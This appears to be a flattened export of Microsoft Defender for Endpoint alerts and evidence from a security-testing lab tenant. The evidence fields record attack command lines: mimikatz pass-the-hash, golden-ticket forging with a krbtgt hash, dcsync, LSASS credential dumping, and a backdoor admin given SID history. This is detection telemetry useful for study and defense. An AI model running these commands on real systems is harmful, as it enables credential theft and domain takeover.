70df765f554ed7392200422c18776b8992c09231
912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9
mimikatz.exe
6,412
"mimikatz.exe" privilege::debug "sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv2.m365dpoc.com /run:\"powershell.exe dir \\msdxv2-win10b\C$ >> C:\M365DAttack\Step3-PasstheHash.txt\"" exit
2022-11-21T02:05:25.5028748Z
11,068
2022-11-21T02:01:28.4753286Z
null
null
null
null
dacfe313ad-33a5-499e-b640-8a03674418ad_1
cfe313ad-33a5-499e-b640-8a03674418ad_1
989
MicrosoftDefenderForEndpoint
2023-01-24T05:33:37.2373794Z
2023-01-24T05:45:53.9933333Z
null
2023-01-24T05:31:07.7317775Z
2023-01-24T05:43:53.4755031Z
Ransomware behavior detected in the file system
Suspicious file system changes might indicate ransomware activity. This potential ransomware activity might be indicative of mass encryption of files by ransomware.
Ransomware
New
High
null
UnsupportedAlertType
null
null
WindowsDefenderAtp
1f1e3118-fa77-4fde-a750-9900c7a1dae3
null
null
null
[ "T1486" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Unknown", "deviceDnsName": "diytestmachine", "firstSeen": "2023-01-24T04:45:42.979Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "administrator1", "domainName": "DIYTESTMACHINE" } ], "mdatpDevi...
[ { "aadUserId": null, "accountName": "User1", "detectionStatus": null, "deviceId": null, "domainName": "DIYTESTMACHINE", "entityType": "User", "evidenceCreationTime": "2023-01-24T05:33:37.4166667Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreat...
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-11-19T02:34:25.7533333Z
Suspicious
None
jeff
null
S-1-5-21-2300221942-1987151257-321556088-1104
null
null
6cbce4a295c163791b60fc23d285e6d84f28ee4c
de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c
powershell.exe
7,228
powershell -enc ZABpAHIA
2022-11-19T02:08:50.3807445Z
11,120
2022-11-19T02:08:50.3566833Z
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-21T02:04:36.8866667Z
Malicious
None
ronhd
MSDXV2
S-1-5-21-2300221942-1987151257-321556088-1111
89b6fc86-af84-47b2-a72d-325362598b2c
ronhd@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-21T02:03:39.9733333Z
Benign
None
jeff
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-12-22T08:59:44.34Z
Suspicious
None
alice
MSDXV8
S-1-5-21-2159906967-4174806019-1002223092-1107
null
steve@msdxv8.m365dpoc.com
ded8fd7f36417f66eb6ada10e0c0d7c0022986e9
bc866cfcdda37e24dc2634dc282c7a0e6f55209da17a8fa105b07414c0e7c527
cmd.exe
C:\Windows\System32
3,032
"cmd" /c "net.exe user /add BDAdmin Password1! && net.exe stop ntds /y && powershell.exe -Command "Add-ADDBSidHistory -SamAccountName BDAdmin -SidHistory \"S-1-5-32-544\" -DatabasePath (Get-ItemProperty -Path Registry::HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Parameters).\"DSA Database file\"" && net.exe start ntds"
2022-12-22T08:48:18.0279285Z
6,016
2022-12-22T08:48:15.1693264Z
PSEXESVC.exe
C:\Windows
Detected
3ad3fb0567038c2ec2e59e76690c2e6c01253af9
da638041842704587874_257814372
d856218f-f89b-442a-9e63-2b72d333b631
728
MicrosoftDefenderForEndpoint
2022-11-16T08:31:10.4588082Z
2022-11-19T01:35:45.0566667Z
2022-11-19T01:35:45.03Z
2022-11-16T08:30:18.2484202Z
2022-11-16T08:30:20.2780262Z
Microsoft Defender Antivirus protection turned off
A protection feature in Microsoft Defender Antivirus has been turned off. An attacker might be trying to evade detection.
DefenseEvasion
Resolved
Medium
null
UnsupportedAlertType
TruePositive
SecurityTesting
WindowsDefenderAtp
427ebd98-42c9-4204-82fa-4e833602e9ca
takeshi@msdxv2.m365dpoc.com
null
null
[ "T1562.001" ]
[ { "aadDeviceId": "c053f02e-4bf2-4146-8faa-8971c550f156", "defenderAvStatus": "NotSupported", "deviceDnsName": "msdxv2-srv2016.msdxv2.m365dpoc.com", "firstSeen": "2022-08-08T08:30:43.818Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "jesse", "domainNam...
[ { "aadUserId": "34a6a005-fc93-42dc-ae87-352d3e9921c4", "accountName": "jesse", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-11-16T08:31:10.5066667Z", "fileName": null, "filePath": null, "ipAddr...
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-09-30T06:14:47.4866667Z
Suspicious
Active
analyst
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
70df765f554ed7392200422c18776b8992c09231
912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9
mimikatz.exe
C:\M365DAttack\Mimikatz\x64
6,036
"mimikatz.exe" privilege::debug "kerberos::golden /domain:msdxv2.m365dpoc.com /sid:S-1-5-21-1296854425-3029985372-4181197820 /krbtgt:334c5cf2bab300e3e456e328f5c699d3 /user:Steve /ticket:C:\M365DAttack\Admin-Tickets\ticket.kirbi /ptt" exit
2022-09-30T06:13:06.97219Z
4,064
2022-09-30T06:11:13.210308Z
powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0
Detected
c7e147cb0eb3534a4dcea5acb8e61c933713b145
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-16T08:31:10.4566667Z
Suspicious
None
operator
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1109
34a6a005-fc93-42dc-ae87-352d3e9921c4
jesse@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
da638072963679110202_1965280652
7b890db4-84dd-4df4-bace-1fc396a2f272
975
MicrosoftDefenderForEndpoint
2022-12-22T08:59:27.9110406Z
2022-12-22T09:10:42.2666667Z
null
2022-12-22T08:26:26.4888159Z
2022-12-22T09:08:59.147227Z
Suspicious System Owner/User Discovery
A known tool or technique was used to gather information on this device. Attackers might be trying to gather information about the target device or network for later attacks.
Discovery
New
Low
null
UnsupportedAlertType
null
null
WindowsDefenderAtp
9bfe28a9-21eb-4f8a-b51e-38ebd3650c88
null
null
null
[ "T1033", "T1059.001", "T1087.001" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "msdxv8-win10v.msdxv8.m365dpoc.com", "firstSeen": "2022-12-08T05:21:19.944Z", "healthStatus": "Active", "loggedOnUsers": [], "mdatpDeviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1", "onboardingStatus": "Onboar...
[ { "aadUserId": null, "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": "MSDXV8", "entityType": "User", "evidenceCreationTime": "2022-12-22T08:59:27.94Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null...
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-21T02:07:46.14Z
Suspicious
None
admin
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1111
89b6fc86-af84-47b2-a72d-325362598b2c
ronhd@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-18T05:10:42.37Z
Suspicious
None
MSDXV2-Win10V$
test.domain
S-1-5-18
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
da638043451809630419_-665093391
beaf820c-2f6c-4b34-8b75-09f18ebaf689
741
MicrosoftDefenderForEndpoint
2022-11-18T05:13:00.9630666Z
2022-11-19T01:35:46.6533333Z
2022-11-19T01:35:46.5533333Z
2022-11-18T05:11:26.6986272Z
2022-11-18T05:16:26.1851657Z
Password hashes dumped from LSASS memory
LSASS process memory has been read to obtain password hashes, indicating possible credential theft. Attackers can use hashes obtained from LSASS process memory to impersonate or perform actions on behalf of logged on or recently logged on users.
CredentialAccess
Resolved
Medium
47
PartiallyInvestigated
TruePositive
SecurityTesting
WindowsDefenderAtp
2ed33edd-2c33-49fd-877b-ab73fba14d59
takeshi@msdxv2.m365dpoc.com
null
null
[ "T1003", "T1003.001" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "rnd.local", "firstSeen": "2022-08-08T08:51:02.455Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "jeff", "domainName": "MSDXV2" } ], "mdatpDeviceId": "c7e147cb0eb3534...
[ { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-11-18T05:13:01.0066667Z", "fileName": null, "filePath": null, "ipAddre...
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
da638037710596771628_-1507341423
eb8166f8-8eea-4ef4-ae4b-acf5fd40ef30
707
MicrosoftDefenderForEndpoint
2022-11-11T13:44:19.6771898Z
2022-11-12T01:35:43.1133333Z
2022-11-12T01:35:42.9033333Z
2022-11-11T13:30:23.5780983Z
2022-11-11T13:30:23.5780983Z
'Locky' ransomware was prevented
Ransomware use common methods to encrypt files using keys that are known only to attackers. As a result, victims are unable to access the contents of the encrypted files. Most ransomware display or drop a ransom note—an image or an HTML file that contains information about how to obtain the attacker-supplied decryption tool for a fee.   To target documents or other files that contain user data, some ransomware look for files in certain locations and files with certain extension names. It is also common for ransomware to rename encrypted files so that they all use the same extension name.  This detection might indicate that the malware was stopped from delivering its payload. However, it is prudent to check the machine for signs of infection.
Ransomware
Resolved
Medium
42
PartiallyRemediated
TruePositive
SecurityTesting
WindowsDefenderAv
51d03c45-b142-4de4-95df-01b0c259d8f6
takeshi@msdxv2.m365dpoc.com
null
Locky
[]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "takeshi-win10b.takeshi.m365dpoc.com", "firstSeen": "2022-11-11T13:23:18.268Z", "healthStatus": "Inactive", "loggedOnUsers": [], "mdatpDeviceId": "d358873e58e59dd581ae039d6adf230c0054adb0", "onboardingStatus": "On...
[ { "aadUserId": null, "accountName": null, "detectionStatus": "Prevented", "deviceId": "d358873e58e59dd581ae039d6adf230c0054adb0", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-11-11T13:44:19.8233333Z", "fileName": "TestFile_Block_Office_applications_from_cre...
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-11-11T08:28:42.99Z
Suspicious
None
jeff
null
S-1-5-21-2300221942-1987151257-321556088-1104
null
null
70df765f554ed7392200422c18776b8992c09231
912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9
mimikatz.exe
816
type secret.txt
2022-11-11T08:17:06.6760783Z
4,704
2022-11-11T08:16:44.2952776Z
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-09-30T06:14:47.4866667Z
Suspicious
Active
bob
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
70df765f554ed7392200422c18776b8992c09231
912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9
mimikatz.exe
C:\M365DAttack\Mimikatz\x64
6,036
"mimikatz.exe" privilege::debug "kerberos::golden /domain:msdxv2.m365dpoc.com /sid:S-1-5-21-1296854425-3029985372-4181197820 /krbtgt:334c5cf2bab300e3e456e328f5c699d3 /user:Steve /ticket:C:\M365DAttack\Admin-Tickets\ticket.kirbi /ptt" exit
2022-09-30T06:13:06.97219Z
4,064
2022-09-30T06:11:13.210308Z
powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0
Detected
c7e147cb0eb3534a4dcea5acb8e61c933713b145
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-09-30T06:14:46.3933333Z
Suspicious
None
analyst
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
70df765f554ed7392200422c18776b8992c09231
912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9
mimikatz.exe
C:\M365DAttack\Mimikatz\x64
9,940
"mimikatz.exe" privilege::debug "kerberos::ptt C:\M365DAttack\Admin-Tickets" exit
2022-09-30T06:13:05.4891851Z
4,064
2022-09-30T06:11:13.210308Z
powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0
Detected
c7e147cb0eb3534a4dcea5acb8e61c933713b145
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-11-11T08:39:46.1966667Z
Suspicious
Active
SYSTEM
NT AUTHORITY
S-1-5-18
null
null
f309b61a8b005b5ce0a3fb58caaa798cfc95f5db
3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748
PSEXESVC.exe
C:\Windows
268
PSEXESVC.exe
2022-11-11T08:17:57.8297749Z
680
2022-11-10T17:17:06.0160973Z
services.exe
C:\Windows\System32
Detected
e138ecd8e7b21eaf952cb35d56349bf50c64ac96
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-14T15:51:20.4166667Z
Suspicious
None
darol
staging.net
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-14T14:03:21Z
Suspicious
None
guest
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
da638001153595901199_-1742865935
e332b21a-1477-40dc-9267-e888f570a686
486
MicrosoftDefenderForEndpoint
2022-09-30T06:15:59.5901388Z
2022-11-19T01:35:42.7033333Z
2022-10-01T01:36:00.5066667Z
2022-09-30T06:13:28.7769316Z
2022-09-30T06:13:28.7769316Z
Suspicious service launched
A suspicious service was started on this device. Attackers might use services to launch malicious commands or programs. This technique is used to maintain persistence or elevate privileges on the target device.
Execution
Resolved
Medium
null
UnsupportedAlertType
TruePositive
SecurityTesting
WindowsDefenderAtp
a5af9713-6eea-4d23-9bdc-9cab19f19092
msftadmin@msdxv2.m365dpoc.com
null
null
[ "T1569.002" ]
[ { "aadDeviceId": null, "defenderAvStatus": "NotSupported", "deviceDnsName": "msdxv2-dc.msdxv2.m365dpoc.com", "firstSeen": "2022-08-08T08:27:58.906Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "defender", "domainName": "MSDXV2" }, { ...
[]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-11T08:18:14.6166667Z
Suspicious
None
bob
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-22T08:50:47.8466667Z
Benign
None
jeff
MSDXV8
S-1-5-21-2159906967-4174806019-1002223092-1104
null
jeff@msdxv8.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
da638045930214658044_-423075346
731f8403-267f-49a4-b9f2-bfbb454256ea
765
MicrosoftDefenderForEndpoint
2022-11-21T02:03:41.4658386Z
2022-11-26T01:35:43.09Z
2022-11-21T03:45:17.4759763Z
2022-11-21T02:01:28.8879277Z
2022-11-21T02:30:59.1966323Z
Suspicious RDP session
A combination of several suspicious RDP session activities has been detected in this device. Attackers might be attempting to establish a foothold in the environment by using various reconnaissance and persistence methods, then evade detection by tampering with and turning off security features to complete their objectives.
SuspiciousActivity
Resolved
High
50
SuccessfullyRemediated
TruePositive
SecurityTesting
WindowsDefenderAtp
e3270960-77a9-4f2b-a6ba-ea6a9d5e86d8
msftadmin@msdxv2.m365dpoc.com
null
null
[ "T1003", "T1021.001", "T1555", "T1558.003" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com", "firstSeen": "2022-08-08T08:51:02.455Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "jeff", "domainName": "MSDXV2" } ], "mdatpDev...
[ { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-11-21T02:03:41.86Z", "fileName": null, "filePath": null, "ipAddress": ...
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-14T16:39:00.0133333Z
Suspicious
None
darol
rnd.local
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-13T14:39:32.6833333Z
Suspicious
None
guest
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
da638045936418350789_1390916301
2d68b4d0-1a7c-4a5a-bc6f-ccc173eca203
765
MicrosoftDefenderForEndpoint
2022-11-21T02:14:01.8350924Z
2022-11-21T03:45:17.6166667Z
2022-11-21T03:45:17.4759763Z
2022-11-21T02:02:38.3423345Z
2022-11-21T02:02:38.3423345Z
'Kekeo' malware was detected
Malware and unwanted software are undesirable applications that perform annoying, disruptive, or harmful actions on affected machines. Some of these undesirable applications can replicate and spread from one machine to another. Others are able to receive commands from remote attackers and perform activities associated with cyber attacks. This detection might indicate that the malware was stopped from delivering its payload. However, it is prudent to check the machine for signs of infection.
Malware
Resolved
Informational
50
SuccessfullyRemediated
null
null
WindowsDefenderAv
d60f5b90-ecd8-4d77-8186-a801597ec762
null
null
Kekeo
[]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "test.domain", "firstSeen": "2022-08-08T08:51:02.455Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "jeff", "domainName": "MSDXV2" } ], "mdatpDeviceId": "c7e147cb0eb35...
[ { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-11-21T02:14:01.8833333Z", "fileName": "Rubeus.exe", "filePath": "C:\\M365DAttac...
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-11-11T08:20:15.4333333Z
Unknown
None
jeff
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
70df765f554ed7392200422c18776b8992c09231
912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9
mimikatz.exe
C:\M365DAttack\Mimikatz\x64
2,420
"mimikatz.exe" "lsadump::dcsync /domain:msdxv2.m365dpoc.com /user:krbtgt" exit
2022-11-11T08:17:36.2207277Z
4,704
2022-11-11T08:16:44.2952776Z
powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0
Detected
c7e147cb0eb3534a4dcea5acb8e61c933713b145
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-18T05:15:19.35Z
Benign
None
jeff
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-21T02:03:41.86Z
Malicious
None
jeff
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-11-11T08:20:15.74Z
Suspicious
None
svc_acct
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
70df765f554ed7392200422c18776b8992c09231
912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9
mimikatz.exe
C:\M365DAttack\Mimikatz\x64
6,044
"mimikatz.exe" privilege::debug sekurlsa::logonpasswords exit
2022-11-11T08:17:06.3382251Z
4,704
2022-11-11T08:16:44.2952776Z
powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0
Detected
c7e147cb0eb3534a4dcea5acb8e61c933713b145
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-18T05:13:00.7233333Z
Suspicious
None
svc_acct
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-18T05:15:31.2733333Z
Unknown
None
jeff
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-11-21T02:03:40.3033333Z
Suspicious
None
jeff
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
70df765f554ed7392200422c18776b8992c09231
912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9
mimikatz.exe
C:\M365DAttack\Mimikatz\x64
7,452
copy con test.txt
2022-11-21T02:01:44.2419747Z
11,068
2022-11-21T02:01:28.4753286Z
powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0
Detected
c7e147cb0eb3534a4dcea5acb8e61c933713b145
da638045930214994785_-457461802
668b61a7-e884-4a59-b731-73ba0effcdec
765
MicrosoftDefenderForEndpoint
2022-11-21T02:03:41.4995013Z
2022-11-21T03:45:17.6166667Z
2022-11-21T03:45:17.4759763Z
2022-11-21T01:55:13.6153204Z
2022-11-21T02:30:59.1966323Z
Suspicious RDP session
A combination of several suspicious RDP session activities has been detected in this device. Attackers might be attempting to establish a foothold in the environment by using various reconnaissance and persistence methods, then evade detection by tampering with and turning off security features to complete their objectives.
SuspiciousActivity
Resolved
High
50
SuccessfullyRemediated
null
null
WindowsDefenderAtp
e3270960-77a9-4f2b-a6ba-ea6a9d5e86d8
null
null
null
[ "T1003", "T1021.001", "T1555", "T1558.003" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com", "firstSeen": "2022-08-08T08:51:02.455Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "jeff", "domainName": "MSDXV2" } ], "mdatpDev...
[ { "aadUserId": null, "accountName": "MSDXV2-Win10V$", "detectionStatus": null, "deviceId": null, "domainName": "MSDXV2", "entityType": "User", "evidenceCreationTime": "2022-11-21T02:03:41.55Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationT...
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-12-22T08:59:27.94Z
Suspicious
None
analyst
MSDXV8
S-1-5-21-2159906967-4174806019-1002223092-1104
null
jeff@msdxv8.m365dpoc.com
6cbce4a295c163791b60fc23d285e6d84f28ee4c
de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c
powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0
6,324
"powershell.exe" -noexit -command Set-Location -literalPath 'C:\Users\jeff\Desktop'
2022-12-22T08:47:11.8139068Z
1,896
2022-12-22T08:26:24.0772409Z
explorer.exe
C:\Windows
Detected
7ba8aa008687dd62d639cb45b52c7c9f971c65c1
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-12-22T08:59:44.34Z
Suspicious
None
steve
MSDXV8
S-1-5-21-2159906967-4174806019-1002223092-1107
null
steve@msdxv8.m365dpoc.com
ded8fd7f36417f66eb6ada10e0c0d7c0022986e9
bc866cfcdda37e24dc2634dc282c7a0e6f55209da17a8fa105b07414c0e7c527
cmd.exe
C:\Windows\System32
3,032
type secret.txt
2022-12-22T08:48:18.0279285Z
6,016
2022-12-22T08:48:15.1693264Z
PSEXESVC.exe
C:\Windows
Detected
3ad3fb0567038c2ec2e59e76690c2e6c01253af9
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-11-21T02:03:40.5733333Z
Suspicious
None
jeff
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
6cbce4a295c163791b60fc23d285e6d84f28ee4c
de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c
powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0
11,616
curl http://malicious
2022-11-21T02:01:44.3957302Z
7,452
2022-11-21T02:01:44.2419747Z
mimikatz.exe
C:\M365DAttack\Mimikatz\x64
Detected
c7e147cb0eb3534a4dcea5acb8e61c933713b145
da638037527860148530_259056164
7044e96a-d5f6-4626-aa4e-8b05f05b825f
686
MicrosoftDefenderForEndpoint
2022-11-11T08:39:46.0148718Z
2022-11-12T01:35:42.87Z
2022-11-11T08:48:29.6221444Z
2022-11-11T08:07:33.1222892Z
2022-11-11T08:07:33.1222892Z
File dropped and launched from remote location
A remote session dropped a file and executed it. An attacker or a malware might be an attempting move laterally or propagate.
LateralMovement
Resolved
Medium
41
Benign
TruePositive
SecurityTesting
WindowsDefenderAtp
17d50613-c135-4981-858e-86cdecb4e46e
msftadmin@msdxv2.m365dpoc.com
null
null
[ "T1021.002", "T1105", "T1570" ]
[ { "aadDeviceId": null, "defenderAvStatus": "NotSupported", "deviceDnsName": "msdxv2-dc.msdxv2.m365dpoc.com", "firstSeen": "2022-08-08T08:27:58.906Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "Defender", "domainName": "MSDXV2" } ], "mda...
[ { "aadUserId": "0808dea1-2ec8-41d2-8e3e-7c18309fab09", "accountName": "steve", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-11-11T08:39:46.1966667Z", "fileName": null, "filePath": null, "ipAddr...
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
da638072958615996658_-1059094230
0028052d-9e47-487e-bfb2-b3c8e42aa452
975
MicrosoftDefenderForEndpoint
2022-12-22T08:51:01.5996851Z
2022-12-22T09:30:38.2066667Z
null
2022-12-22T08:47:23.1319863Z
2022-12-22T09:24:55.5977806Z
Suspicious User Account Discovery
A known tool or technique was used to gather information on this device. Attackers might be trying to gather information about the target device or network for later attacks.
